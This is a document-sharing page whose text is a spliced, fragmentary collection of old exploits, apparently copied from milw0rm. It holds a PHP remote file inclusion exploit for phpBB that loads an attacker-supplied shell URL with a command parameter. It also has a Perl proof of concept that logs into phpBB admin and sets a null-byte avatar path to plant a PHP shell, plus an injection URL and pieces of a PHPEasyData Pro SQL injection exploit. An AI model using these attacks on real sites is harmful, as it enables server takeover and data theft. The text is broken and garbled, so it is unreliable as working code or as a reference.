Hacker Professional part 412

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

Thêm vào BST

Báo xấu

41
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 412', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Hacker Professional part 412

if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p='http://'.$host.':'.$port;} $packet ="GET ".$p."admin/modules_data.php?phpbb_root_path=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpackets($packet); if (strstr($html,"hauru")) { $temp=explode("hauru",$html); die($temp[1]); } echo "Exploit err0r :("; echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam"; ?> # milw0rm.com [2006-10-30] tonyan(HCE) phpBB
# PHP applications. An example of vulnerable applications are phpBB and # punBB. # # Vulnerability can be used to upload or replace arbitrary files on # server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename. # # In case of phpBB and punBB vulnerability can be exploited by changing # location of avatar file and uploading avatar file with PHP code in EXIF # data. # # A PoC exploit to change Avatar file location for phpBB: # # use HTTP::Cookies; use LWP; use URI::Escape; unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"} my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)'); $ua->cookie_jar( HTTP::Cookies->new()); $url='http://'.$ARGV[0].'/login.php'; $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1"; my $req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); my $res = $ua->request($req); $res=$ua->get('http://'.$ARGV[0].'/login.php'); $content=$res->content; $content=~ m/true&sid=([^"]+)"/g; if($ARGV[4]){ $content=$res->content; print $content; } $url='http://'.$ARGV[0].'/login.php'; $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); $res = $ua->request($req); $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1; $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00"; $req = new HTTP::Request 'POST',$url; $req->content_type('application/x-www-form-urlencoded'); $req->content($data); $res = $ua->request($req); if($ARGV[4]){ $content=$res->content; print $content; } black_hat_cr(HCE) phpBB XS
@http://www.example.com/includes/functions.php?phpbb_root_path="www.exam ple2.com" Black_hat_cr(HCE) PHPEasyData Pro 2.2.2 Remote SQL Injection Exploit PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit PHP Code:
guvenlik = Replace(guvenlik,">","") End Function %> PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit function functionControl1(){ setTimeout("functionControl2()",2000); } function functionControl2(){ if(document.form1.field1.value==""){ alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); } } function writetext() { if(document.form1.field1.value==""){ document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take ' } } function write(){ setTimeout("writetext()",1000); }